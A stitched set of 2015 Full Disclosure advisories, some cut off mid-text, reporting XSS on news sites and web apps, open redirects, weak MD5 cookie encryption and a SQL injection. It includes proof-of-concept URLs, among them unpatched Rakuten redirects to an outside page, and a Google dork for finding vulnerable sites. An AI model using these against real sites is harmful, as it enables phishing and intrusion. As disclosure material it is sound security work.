[FD] Daily Mail Registration Page Unvalidated Redirects and Forwards & XSS Web Security Problem

[Jing Wang]

an exploit it by XSS attacks.

The vulnerability occurs at "reportAbuseInComment.html?" page with
"&commentId" parameter, i.e.
http://www.dailymail.co.uk/home/reportAbuseInComment.html?articleId=346288&commentId=877038


POC Code:
http://www.dailymail.co.uk/home/reportAbuseInComment.html?articleId=346288&commentId=";>


The vulnerability can be attacked without user login. Tests were performed
on Mozilla Firefox (34.0) in Ubuntu (14.04) and Microsoft IE (9.0.15) in
Windows 7.



*POC Video:*
https://www.youtube.com/watch?v=Oig-ZrlJDf8&feature=youtu.be



*Blog Detail:*
http://tetraph.com/security/web-security/daily-mail-xss-bug/
http://securityrelated.blogspot.com/2015/10/daily-mail-online-website-xss-cyber.html





*(2.2) What is XSS?*
"Cross-site scripting (XSS) is a type of computer security vulnerability
typically found in web applications. XSS enables attackers to inject
client-side script into web pages viewed by other users. A cross-site
scripting vulnerability may be used by attackers to bypass access controls
such as the same-origin policy. Cross-site scripting carried out on
websites accounted for roughly 84% of all security vulnerabilities
documented by Symantec as of 2007. Their effect may range from a petty
nuisance to a significant security risk, depending on the sensitivity of
the data handled by the vulnerable site and the nature of any security
mitigation implemented by the site's owner." (Wikipedia)




*(2.3) Vulnerability Disclosure:*
This vulnerability has been patched.




Blog Details:
http://tetraph.com/security/website-test/daily-mail-open-redirect-xss/
http://securityrelated.blogspot.com/2015/10/daily-mail-url-redirection-and-xss-bug.html






--
Jing Wang,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU), Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] TeleGraph All Photo (Picture) Pages Have Been Vulnerable to XSS Cyber Attacks

[Jing Wang]

*TeleGraph All Photo (Picture) Pages Have Been Vulnerable to XSS Cyber
Attacks*


*Website Description:*
http://www.telegraph.co.uk


"The Daily Telegraph is a British daily morning English-language broadsheet
newspaper, published in London by Telegraph Media Group and distributed
throughout the United Kingdom and internationally. The newspaper was
founded by Arthur B. Sleigh in June 1855 as The Daily Telegraph and
Courier, and since 2004 has been owned by David and Frederick Barclay. It
had a daily circulation of 523,048 in March 2014, down from 552,065 in
early 2013. In comparison, The Times had an average daily circulation of
400,060, down to 394,448. The Daily Telegraph has a sister paper, The
Sunday Telegraph, that was started in 1961, which had circulation of
418,670 as of March 2014. The two printed papers currently are run
separately with different editorial staff, but there is cross-usage of
stories. News articles published in either, plus online Telegraph articles,
may also be published on the Telegraph Media Group's www.telegraph.co.uk
website, all under The Telegraph title." (From Wikipedia)




Discoved and Disclosured By:
Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and
Mathematical Sciences (SPMS), Nanyang Technological University (NTU),
Singapore. (@justqdjing)
http://www.tetraph.com/wangjing





*(1) Vulnerability Description:*
Telegraph has a Web security bug problem. It is vulnerable to XSS attacks.
In fact, all its photo pages are vulnerable to XSS (Cross-Site Scripting)
vulnerabilities. Telegraph's picture pages use "&frame" as its parameter.
All its web pages use "&frame" are vulnerable to the bugs. Those
vulnerabilities have been patched now.


*Examples of Vulnerable Links:*
http://www.telegraph.co.uk/culture/culturepicturegalleries/10663967/The-worlds-most-spectacular-theatres.html?frame=2836095
http://www.telegraph.co.uk/property/investmentinproperty/10609314/For-sale-top-20-properties-ripe-for-investment.html?frame=2808162
http://www.telegraph.co.uk/foodanddrink/foodanddrinkpicturegalleries/9737226/Elephant-dung-coffee-Black-Ivory-beans-passed-through-the-animals-guts.html?frame=2424280
http://www.telegraph.co.uk/education/9487434/Graduate-jobs-Best-languages-to-study.html?frame=2314790
http://www.telegraph.co.uk/motoring/picturegalleries/10782171/The-20-best-cars-to-own-in-2014.html?frame=2890278



*POC Code:*
http://www.telegraph.co.uk/culture/culturepicturegalleries/10663967/The-worlds-most-spectacular-theatres.html?frame=2836095";>
http://www.telegraph.co.uk/property/investmentinproperty/10609314/For-sale-top-20-properties-ripe-for-investment.html?frame=2808162";>
http://www.telegraph.co.uk/foodanddrink/foodanddrinkpicturegalleries/9737226/Elephant-dung-coffee-Black-Ivory-beans-passed-through-the-animals-guts.html?frame=2424280";>
http://www.telegraph.co.uk/education/9487434/Graduate-jobs-Best-languages-to-study.html?frame=2314790";>
http://www.telegraph.co.uk/motoring/picturegalleries/10782171/The-20-best-cars-to-own-in-2014.html?frame=2890278";>


The vulnerability can be attacked without user login. Tests were performed
on Firefox (37.02) in Ubuntu (14.04) and IE (8.0. 7601) in Windows 7. The
bugs found by using CSXDS.




*(2) XSS Description:*
The description of XSS is: "Cross-Site Scripting (XSS) attacks are a type
of injection, in which malicious scripts are injected into otherwise benign
and trusted web sites. XSS attacks occur when an attacker uses a web
application to send malicious code, generally in the form of a browser side
script, to a different end user. Flaws that allow these attacks to succeed
are quite widespread and occur anywhere a web application uses input from a
user within the output it generates without validating or encoding it."
(OWSAP)




*Poc Video:*
https://www.youtube.com/watch?v=SqjlabJ1OzA&feature=youtu.be





*Blog Details:*
http://www.tetraph.com/security/website-test/telegraph-xss/
http://securityrelated.blogspot.com/2015/10/telegraph-xss-0day.html





*(3) Vulnerability Disclosure:*
These vulnerabilities have been patched now.





--
Jing Wang,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU), Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] VuFind 1.0 Web Application Reflected XSS (Cross-site Scripting) 0-Day Bug Security Issue

[Jing Wang]

*VuFind 1.0 **Web Application **Reflected XSS (Cross-site Scripting) 0-Day
Bug Security Issue*



Exploit Title: VuFind Results? &lookfor parameter Reflected XSS Web
Security Vulnerability
Product: VuFind
Vendor: VuFind
Vulnerable Versions: 1.0
Tested Version: 1.0
Advisory Publication: September 20, 2015
Latest Update: September 25, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference:
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
CVSS Version 2 Metrics:
Access Vector: Network exploitable; Victim must voluntarily interact with
attack mechanism
Access Complexity: Medium
Authentication: Not required to exploit
Impact Type: Allows unauthorized modification
Discover and Reporter: Wang Jing [School of Physical and Mathematical
Sciences (SPMS), Nanyang Technological University (NTU), Singapore]
(@justqdjing)







*Suggestion Details:*


*(1) Vendor & Product Description:*


*Vendor:*
VuFind



*Product & Vulnerable Versions:*
VuFind
1.0



*Vendor URL & Download:*
Product can be obtained from here,
http://sourceforge.net/p/vufind/news/




*Product Introduction Overview:*
"VuFind is a library resource portal designed and developed for libraries
by libraries. The goal of VuFind is to enable your users to search and
browse through all of your library's resources by replacing the traditional
OPAC to include: Catalog Records, Locally Cached Journals, Digital Library
Items, Institutional Repository, Institutional Bibliography, Other Library
Collections and Resources. VuFind is completely modular so you can
implement just the basic system, or all of the components. And since it's
open source, you can modify the modules to best fit your need or you can
add new modules to extend your resource offerings. VuFind runs on Solr
Energy. Apache Solr, an open source search engine, offers amazing
performance and scalability to allow for VuFind to respond to search
queries in milliseconds time. It has the ability to be distributed if you
need to spread the load of the catalog over many servers or in a server
farm environment. VuFind is offered for free through the GPL open source
license. This means that you can use the software for free. You can modify
the software and share your successes with the community! Take a look at
our VuFind Installations Wiki page to see how a variety of organizations
have taken advantage of VuFind's flexibility. If you are already using
VuFind, feel free to edit the page and share your accomplishments. "






*(2) Vulnerability Details:*
VuFind web application has a computer security problem. Hackers can exploit
it by reflected XSS cyber attacks. This may allow a remote attacker to
create a specially crafted request that would execute arbitrary script code
in a user's browser session within the trust relationship between their
browser and the server.

Several other similar products 0-day vulnerabilities have been found by
some other bug researchers before. VuFind has patched some of them. "scip
AG was founded in 2002. We are driven by innovation, sustainability,
transparency, and enjoyment of our work. We are completely self-funded and
are thus in the comfortable position to provide completely independent and
neutral services. Our staff consists of highly specialized experts who
focus on the topic information security and continuously further their
expertise through advanced training".


*(2.1)* The code flaw occurs at "lookfor?" parameter in
"/vufind/Resource/Results?" page.

Some other researcher has reported a similar vulnerability here and VuFind
has patched it.
https://vufind.org/jira/si/jira.issueviews:issue-html/VUFIND-54/VUFIND-54.html







*(3) Solution:*
Update to new version.









*References:*
http://tetraph.com/security/xss-vulnerability/vufind-xss/
http://securityrelated.blogspot.com/2015/09/vufind-xss.html
https://vulnerabilitypost.wordpress.com/2015/09/22/vufind-xss/
http://tetraph.blog.163.com/blog/static/234603051201582525130175/
https://packetstormsecurity.com/files/133374/Winmail-Server-4.2-Cross-Site-Scripting.html
http://marc.info/?l=oss-security&m=144094021709472&w=4
http://lists.openwall.net/full-disclosure/2015/08/31/2
http://ithut.tumblr.com/post/128012509383/webcabinet-winmail-server-42-reflected-xss
http://seclists.org/fulldisclosure/2015/Aug/84
http://lists.openwall.net/full-disclosure/2015/08/31/2







--
Jing Wang,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU), Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Winmail Server 4.2 Reflected XSS (Cross-site Scripting) Web Application 0-Day Security Bug

[Jing Wang]

*Winmail Server 4.2 Reflected XSS (Cross-site Scripting) Web Application
0-Day Security Bug*



Exploit Title: Winmail Server badlogin.php &lid parameter Reflected XSS Web
Security Vulnerability
Product: Winmail Server
Vendor: Winmail Server
Vulnerable Versions: 4.2   4.1
Tested Version: 4.2   4.1
Advisory Publication: August 24, 2015
Latest Update: August 30, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference:
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
CVSS Version 2 Metrics:
Access Vector: Network exploitable; Victim must voluntarily interact with
attack mechanism
Access Complexity: Medium
Authentication: Not required to exploit
Impact Type: Allows unauthorized modification
Discover and Reporter: Wang Jing [School of Physical and Mathematical
Sciences (SPMS), Nanyang Technological University (NTU), Singapore]
(@justqdjing)









*Suggestion Details:*


*(1) Vendor & Product Description:*


*Vendor:*
Winmail Server



*Product & Vulnerable Versions:*
Winmail Server
4.2   4.1



*Vendor URL & Download:*
Product can be obtained from here,
http://www.magicwinmail.net/download.asp




*Product Introduction Overview:*
"Winmail Server is an enterprise class mail server software system offering
a robust feature set, including extensive security measures. Winmail Server
supports SMTP, POP3, IMAP, Webmail, LDAP, multiple domains, SMTP
authentication, spam protection, anti-virus protection, SSL security,
Network Storage, remote access, Web-based administration, and a wide array
of standard email options such as filtering, signatures, real-time
monitoring, archiving, and public email folders. Winmail Server can be
configured as a mail server or gateway for ISDN, ADSL, FTTB and cable modem
networks, beyond standard LAN and Internet mail server configurations."








*(2) Vulnerability Details:*
Winmail Server web application has a computer security problem. Hackers can
exploit it by reflected XSS cyber attacks. This may allow a remote attacker
to create a specially crafted request that would execute arbitrary script
code in a user's browser session within the trust relationship between
their browser and the server.

Several other similar products 0-day vulnerabilities have been found by
some other bug hunter researchers before. Winmail Server has patched some
of them. "scip AG was founded in 2002. We are driven by innovation,
sustainability, transparency, and enjoyment of our work. We are completely
self-funded and are thus in the comfortable position to provide completely
independent and neutral services. Our staff consists of highly specialized
experts who focus on the topic information security and continuously
further their expertise through advanced training". Scip has recorded
similar XSS bugs, such as scipID 26980.



*(2.1) *The code flaw occurs at "&lid" parameter in "badlogin.php" page. In
fact, CVE-2005-3692 mentions that "&retid" parameter in "badlogin.php" page
is vulnerable to XSS attacks. But it does not mention "&lid" parameter".
The scipID of the bug is 26980. Bugtraq (SecurityFocus) ID is 15493. OSVDB
ID is 20926.







*References:*
http://tetraph.com/security/xss-vulnerability/winmail-server-4-2-reflected-xss/
http://securityrelated.blogspot.com/2015/08/winmail-server-42-reflected-xss.html
http://seclists.org/fulldisclosure/2015/May/103
http://marc.info/?l=full-disclosure&m=143110916812709&w=4
http://permalink.gmane.org/gmane.comp.security.fulldisclosure/2028
http://webtech.lofter.com/post/1cd3e0d3_6eef8c8
http://whitehatpost.blog.163.com/blog/static/242232054201573091630996/
https://hackertopic.wordpress.com/2015/08/25/winmail-server-4-2-reflected-xss/
http://whitehatview.tumblr.com/post/118853357881/tetraph-cve-2014-9468-instantasp
http://marc.info/?l=full-disclosure&m=142649827629327&w=4
https://packetstormsecurity.com/files/132029/SITEFACT-CMS-2.01-Cross-Site-Scripting.html






--
Jing Wang,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU), Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] KnowledgeTree OSS 3.0.3b Reflected XSS (Cross-site Scripting) Web Application 0-Day Security Bug

[Jing Wang]

*KnowledgeTree OSS 3.0.3b Reflected XSS (Cross-site Scripting) Web
Application 0-Day Security Bug*



Exploit Title: KnowledgeTree login.php &errorMessage parameter Reflected
XSS Web Security Vulnerability
Product: Knowledge Tree Document Management System
Vendor: Knowledge Inc
Vulnerable Versions: OSS 3.0.3b
Tested Version: OSS 3.0.3b
Advisory Publication: August 22, 2015
Latest Update: August 31, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference:
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
CVSS Version 2 Metrics:
Access Vector: Network exploitable; Victim must voluntarily interact with
attack mechanism
Access Complexity: Medium
Authentication: Not required to exploit
Impact Type: Allows unauthorized modification
Discover and Reporter: Wang Jing [School of Physical and Mathematical
Sciences (SPMS), Nanyang Technological University (NTU), Singapore]
(@justqdjing)









*Suggestion Details:*


*(1) Vendor & Product Description:*


*Vendor:*
KnowledgeTree



*Product & Vulnerable Versions:*
Knowledge Tree Document Management System
OSS 3.0.3b



*Vendor URL & Download:*
Product can be obtained from here,
http://download.cnet.com/KnowledgeTree-Document-Management-System/3000-10743_4-10632972.html
http://www.knowledgetree.com/




*Product Introduction Overview:*
"KnowledgeTree is open source document management software designed for
business people to use and install. Seamlessly connect people, ideas, and
processes to satisfy all your collaboration, compliance, and business
process requirements. KnowledgeTree works with Microsoft® Office®,
Microsoft® Windows® and Linux®."







*(2) Vulnerability Details:*
KnowledgeTree web application has a computer security problem. Hackers can
exploit it by reflected XSS cyber attacks. This may allow a remote attacker
to create a specially crafted request that would execute arbitrary script
code in a user's browser session within the trust relationship between
their browser and the server.

Several other similar products 0-day vulnerabilities have been found by
some other bug hunter researchers before. KnowledgeTree has patched some of
them. "Bugtraq is an electronic mailing list dedicated to issues about
computer security. On-topic issues are new discussions about
vulnerabilities, vendor security-related announcements, methods of
exploitation, and how to fix them. It is a high-volume mailing list, and
almost all new vulnerabilities are discussed there.". It has listed similar
exploits, such as Bugtraq (Security Focus) 32920.



*(2.1) *The code flaw occurs at "&errorMessage" parameter in "login.php"
page.

One similar bug is CVE-2008-5858. Its X-Force ID is 47529.








*References:*
http://tetraph.com/security/xss-vulnerability/knowledgetree-oss-3-0-3b-reflected-xss/
http://securityrelated.blogspot.com/2015/08/knowledgetree-oss-303b-reflected-xss.html
http://seclists.org/fulldisclosure/2015/May/31
https://progressive-comp.com/?l=full-disclosure&m=143110966112898&w=1
https://packetstormsecurity.com/files/132927/PhotoPost-PHP-4.8c-Cross-Site-Scripting.html
http://whitehatpost.blog.163.com/blog/static/242232054201573084141976/
https://hackertopic.wordpress.com/2015/08/22/knowledgetree-oss-3-0-3b-reflected-xss/
http://lists.openwall.net/full-disclosure/2015/03/10/5
http://marc.info/?l=full-disclosure&m=143251239323317&w=4
https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01415.html








--
Jing Wang,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU), Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] PhotoPost PHP 4.8c Cookie Based Stored XSS (Cross-site Scripting) Web Application 0-Day Bug

[Jing Wang]

uke
PostNuke
Mambo
XMB Forums

(Src:
http://www.photopost.com/sites_frame.pl?http://www.photopost.com/photopost/adm-index.php
)









*References:*
http://tetraph.com/security/xss-vulnerability/photopost-php/
http://securityrelated.blogspot.com/2015/07/photopost-php-48c-cookie-based-stored.html
https://progressive-comp.com/?l=full-disclosure&m=142649827629327&w=1
https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01901.html
https://vulnerabilitypost.wordpress.com/2015/07/27/photopost-php/
http://tetraph.blog.163.com/blog/static/234603051201563055350773/
http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1817
http://www.inzeed.com/kaleidoscope/xss-vulnerability/rakuten-website-xss/
http://seclists.org/fulldisclosure/2015/Mar/56
http://lists.openwall.net/full-disclosure/2015/03/07/4







--
Jing Wang,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] FC2 & Rakuten Online Websites Multiple XSS (Cross-site Scripting) and Open Redirect Cyber Vulnerabilities

[Jing Wang]

erabilities and exploitation techniques, as well as tools, papers,
news, and events of interest to the community. FD differs from other
security lists in its open nature and support for researchers' right to
decide how to disclose their own discovered bugs. The full disclosure
movement has been credited with forcing vendors to better secure their
products and to publicly acknowledge and fix flaws rather than hide them.
Vendor legal intimidation and censorship attempts are not tolerated here!"
A great many of the fllowing web securities have been published here,
Buffer overflow, HTTP Response Splitting (CRLF), CMD Injection, SQL
injection, Phishing, Cross-site scripting, CSRF, Cyber-attack, Unvalidated
Redirects and Forwards, Information Leakage, Denial of Service, File
Inclusion, Weak Encryption, Privilege Escalation, Directory Traversal, HTML
Injection, Spam.


The program code flaw can be attacked without user login. Tests were
performed on Microsoft IE (9 9.0.8112.16421) of Windows 7, Mozilla Firefox
(37.0.2) & Google Chromium 42.0.2311 (64-bit) of Ubuntu (14.04.2)，Apple
Safari 6.1.6 of Mac OS X v10.9 Mavericks.


Since know only a little Japanese, not sure whether Rakuten pays much
attention to Open Redirect Vulnerabilities or not.





*(2.2.2)* Use one of webpages for the following tests. The webpage address
is "http://www.inzeed.com/kaleidoscope/";. Can suppose that this webpage is
malicious.



Vulnerable URL 1:
http://account.rakuten-sec.co.jp/cgi-bin/btracking?URL=https://www.netflix.com/movies/

POC Code:
http://account.rakuten-sec.co.jp/cgi-bin/btracking?URL=http://www.inzeed.com/kaleidoscope/




Vulnerable URL 2:
http://affiliate.rakuten.com/fs-bin/click?u1=no_refer&id=Jv*v1/Wldzg&subid=0&offerid=229300.1&type=10&tmpid=6933&RD_PARM1=http%3A%2F%2Fadcash.com%2fmoney

POC Code:
http://affiliate.rakuten.com/fs-bin/click?u1=no_refer&id=Jv*v1/Wldzg&subid=0&offerid=229300.1&type=10&tmpid=6933&RD_PARM1=http://www.inzeed.com/kaleidoscope/




Vulnerable URL 3:
http://clickfrom.rakuten.com/default.asp?adid=17379&sURL=http%3A%2F%2Fwww.craigslist.org

POC Code:
http://clickfrom.rakuten.com/default.asp?sURL=http://www.inzeed.com/kaleidoscope/






*Poc Video:*
https://www.youtube.com/watch?v=uxsuLgAdpCw


*Blog Detail:*
http://tetraph.com/security/open-redirect/rakuten-open-redirect/
http://securityrelated.blogspot.com/2015/06/rakuten-open-redirect.html





*(2.2.3) Vulnerability Disclosure:*
Those vulnerabilities are not patched now.








*More Details:*
http://tetraph.com/security/web-security/fc2-rakuten-xss-and-url-redirection/
http://securityrelated.blogspot.com/2015/06/fc2-rakuten-online-websites-multiple.html






--
Jing Wang,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] 6kbbs v8.0 Weak Encryption Cryptography Security Vulnerabilities

[Jing Wang]

*6kbbs v8.0 Weak Encryption Cryptography Security Vulnerabilities*


Exploit Title: 6kbbs Weak Encryption Web Security Vulnerabilities
Vendor: 6kbbs
Product: 6kbbs
Vulnerable Versions: v7.1   v8.0
Tested Version: v7.1   v8.0
Advisory Publication: June 08, 2015
Latest Update: June 10, 2015
Vulnerability Type: Inadequate Encryption Strength [CWE-326]
CVE Reference: *
CVSS Severity (version 2.0):
Discover and Reporter: Wang Jing [School of Physical and Mathematical
Sciences (SPMS), Nanyang Technological University (NTU), Singapore]
(@justqdjing)






*Recommendation Details:*


*(1) Vendor & Product Description:*


Vendor:
6kbbs



*Product & Vulnerable Versions:*
6kbbs
v7.1
v8.0



*Vendor URL & download:*
6kbbs can be gain from here,
http://www.6kbbs.com/download.html




*Product Introduction Overview:*
"6kbbs V8.0 is a PHP + MySQL built using high-performance forum, has the
code simple, easy to use, powerful, fast and so on. It is an excellent
community forum program. The program is simple but not simple; fast, small;
Interface generous and good scalability; functional and practical pursuing
superior performance, good interface, the user's preferred utility
functions. Forum Technical realization (a) interface : using XHTML + CSS
structure, so the structure of the page , easy to modify the interface ;
save the transmission static page code , greatly reducing the amount of
data transmitted over the network ; improve the interface scalability ,
more in line with WEB standards, support Internet Explorer, FireFox, Opera
and other major browsers. (b) Program : The ASP + ACCESS mature technology
, the installation process is extremely simple , the environment is also
very common."


"(1) PHP version : (a) 6kbbs V8.0 start using PHP + MySQL architecture. (b)
Currently ( July 2010 ) is still in the testing phase , 6kbbs V8.0 is the
latest official release. (2) ASP Version: 6kbbs (6k Forum) is an excellent
community forum process . The program is simple but not simple ; fast ,
small ; interface generous and good scalability ; functional and practical
. pursue superiority , good interface , practical functions of choice for
subscribers."





*(2) Vulnerability Details:*
6kbbs web application has a computer security problem. It can be exploited
by weak encryption attacks. The software stores or transmits sensitive data
using an encryption scheme that is theoretically sound, but is not strong
enough for the level of protection required. A weak encryption scheme can
be subjected to brute force attacks that have a reasonable chance of
succeeding using current attack methods and resources.


Several 6kbbs products 0-day web cyber bugs have been found by some other
bug hunter researchers before. 6kbbs has patched some of them. "The Full
Disclosure mailing list is a public forum for detailed discussion of
vulnerabilities and exploitation techniques, as well as tools, papers,
news, and events of interest to the community. FD differs from other
security lists in its open nature and support for researchers' right to
decide how to disclose their own discovered bugs. The full disclosure
movement has been credited with forcing vendors to better secure their
products and to publicly acknowledge and fix flaws rather than hide them.
Vendor legal intimidation and censorship attempts are not tolerated here!"
A great many of the web securities have been published here.




Source Code:
row_select_one("users","username='{$username}'");
if(!empty($extrow) && !empty($extrow['salt'])){

if(md5(md5($userpass).$extrow['salt'])==$extrow['userpass']){
$row=$extrow;
$new_row["userpass"]=$userpass_encrypt;
$new_row["salt"]="";

$db->row_update("users",$new_row,"id={$extrow['id']}");
}
}
}
?>



Source Code From:
http://code.google.com/p/6kbbs/source/browse/trunk/convert/discuz72/loginext.php?r=16


We can see that "userpass" stored in cookie was encrypted using "$userpass"
user password directly. And there is no "HttpOnly" attribute at all. Since
md5 is used for the encryption, it is easy for hackers to break the
encrypted message.


"The MD5 message-digest cryptography algorithm is a widely used
cryptographic hash function producing a 128-bit (16-byte) hash value,
typically expressed in text format as a 32 digit hexadecimal number. Papers
about it have been published on Eurocrypt, Asiacrypt and Crypto. Meanwhile,
researchers focusing on it spread in Computer Science, Computer
Engineering, IEEE and Mathematics. MD5 has been utilized in a wide variety
of cryptographic applications, and is also commonly used to verify data
integrity. MD5 was designed by Ronald Rivest in 1991 to replace an earlier
hash function, MD4. The source code in RFC 1321 contains a "by attribution"
RSA license." (Wikipedia)








*References:*
http://tetraph.com/security/weak-encryption/6kbbs-v8-0-weak-encryption/
http://securityrelated.blogspot.com/2015/06/6kbbs-v80-

[FD] phpwind v8.7 Unvalidated Redirects and Forwards Web Security Vulnerabilities

[Jing Wang]

*phpwind v8.7 Unvalidated Redirects and Forwards Web Security
Vulnerabilities*



Exploit Title: phpwind v8.7 goto.php? &url Parameter Open Redirect Security
Vulnerabilities
Product: phpwind
Vendor: phpwind
Vulnerable Versions: v8.7
Tested Version: v8.7
Advisory Publication: May 24, 2015
Latest Update: May 24, 2015
Vulnerability Type: URL Redirection to Untrusted Site ('Open Redirect')
[CWE-601]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 5.8 (MEDIUM) (AV:N/AC:M/Au:N/C:P/I:P/A:N) (legend)
Impact Subscore: 4.9
Exploitability Subscore: 8.6
Writer and Reporter: Wang Jing [School of Physical and Mathematical
Sciences (SPMS), Nanyang Technological University (NTU), Singapore]
(@justqdjing)





*Caution Details:*


*(1) Vendor & Product Description:*


*Vendor:*
phpwind



*Product & Vulnerable Versions:*
phpwind
v8.7



*Vendor URL & Download:*
Product can be obtained from here,
http://www.phpwind.net/thread/166





*Product Introduction Overview:*
"Today, the country's 200,000 worth of small sites, there are nearly
100,000 community site uses phpwind, has accumulated more than one million
sites use phpwind, there are 1,000 new sites every day use phpwind. These
community sites covering 52 types of trades every day one million people
gathered in phpwind build community, issued 50 million new information,
visit more than one billion pages. National Day PV30 million or more in
1000 about a large community, there are more than 500 sites selected
phpwind station software provided, including by scouring link Amoy
satisfaction, a daily e-commerce and marketing groups, and other on-line
product vigorously increase in revenue for the site. Excellent partners,
such as Xiamen fish, of Long Lane, Erquan network, Kunshan forum, the North
Sea 360, Huizhou West Lake, Huashang like.

phpwind recent focus on strengthening community media value, expand
e-commerce applications community. phpwind focus on small sites to explore
the value of integration and applications, we believe that the website that
is community, the community can provide a wealth of applications to meet
people access to information, communication, entertainment, consumer and
other living needs, gain a sense of belonging, become online home . With
the development of the Internet, in the form of the site will be more
abundant, the integration of the Forum, more forms of information portals,
social networking sites, we will integrate these applications to products
which, and to create the most optimized user experience. phpwind mission is
to make the community more valuable, so that more people enjoy the
convenience of the Internet community in order to enhance the quality of
life."





*(2) Vulnerability Details:*
phpwind web application has a computer cyber security bug problem. It can
be exploited by Unvalidated Redirects and Forwards (URL Redirection)
attacks. This could allow a user to create a specially crafted URL, that if
clicked, would redirect a victim from the intended legitimate web site to
an arbitrary web site of the attacker's choosing. Such attacks are useful
as the crafted URL initially appear to be a web page of a trusted site.
This could be leveraged to direct an unsuspecting user to a web page
containing attacks that target client side software such as a web browser
or document rendering programs.

Several other similar products 0-day vulnerabilities have been found by
some other bug hunter researchers before. phpwind has patched some of them.
The Full Disclosure mailing list is a public forum for detailed discussion
of vulnerabilities and exploitation techniques, as well as tools, papers,
news, and events of interest to the community. FD differs from other
security lists in its open nature and support for researchers' right to
decide how to disclose their own discovered bugs. The full disclosure
movement has been credited with forcing vendors to better secure their
products and to publicly acknowledge and fix flaws rather than hide them.
Vendor legal intimidation and censorship attempts are not tolerated here!
It also publishes suggestions, advisories, solutions details related to
Open Redirect vulnerabilities and cyber intelligence recommendations.


*(2.1) *The first programming code flaw occurs at "&url" parameter in
"/goto.php?" page.





*References:*
http://www.tetraph.com/security/open-redirect/phpwind-v8-7-open-redirect/
http://securityrelated.blogspot.com/2015/05/phpwind-v87-xss.html
http://www.inzeed.com/kaleidoscope/computer-security/phpwind-v8-7-open-redirect/
https://webtechwire.wordpress.com/2015/05/24/phpwind-v8-7-open-redirect-2/
https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01741.html
http://whitehatpost.blog.163.com/blog/static/242232054201542495731506/
http://cxsecurity.com/issue/WLB-2015030028
http://permalink.gmane.org/gmane.comp.security.oss.general/16883
http://lists.openwall.net/full-disclosu

[FD] Gcon Tech Solutions v1.0 SQL Injection Web Security Vulnerabilities

[Jing Wang]

*Gcon Tech Solutions v1.0 SQL Injection Web Security Vulnerabilities*


Exploit Title: Gcon Tech Solutions v1.0 content.php? &id Parameter SQL
Injection Security Vulnerabilities
Product: Gcon Tech Solutions
Vendor: Gcon Tech Solutions
Vulnerable Versions: v1.0
Tested Version: v1.0
Advisory Publication: May 24, 2015
Latest Update: May 24, 2015
Vulnerability Type: Improper Neutralization of Special Elements used in an
SQL Command ('SQL Injection') [CWE-89]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 7.5 (HIGH) (AV:N/AC:L/Au:N/C:P/I:P/A:P) (legend)
Impact Subscore: 6.4
Exploitability Subscore: 10.0
Writer and Reporter: Wang Jing [School of Physical and Mathematical
Sciences (SPMS), Nanyang Technological University (NTU), Singapore]
(@justqdjing)




*Recommendation Details:*


*(1) Vendor & Product Description:*


*Vendor:*
Gcon Tech Solutions



*Product & Vulnerable Versions:*
Gcon Tech Solutions
v1.0



*Vendor URL & Download:*
Gcon Tech Solutions can be obtained from here,
http://www.gconts.com/Development.htm



*Google Dork:*
"Developed and maintained by Gcon Tech Solutions"



*Product Introduction Overview:*
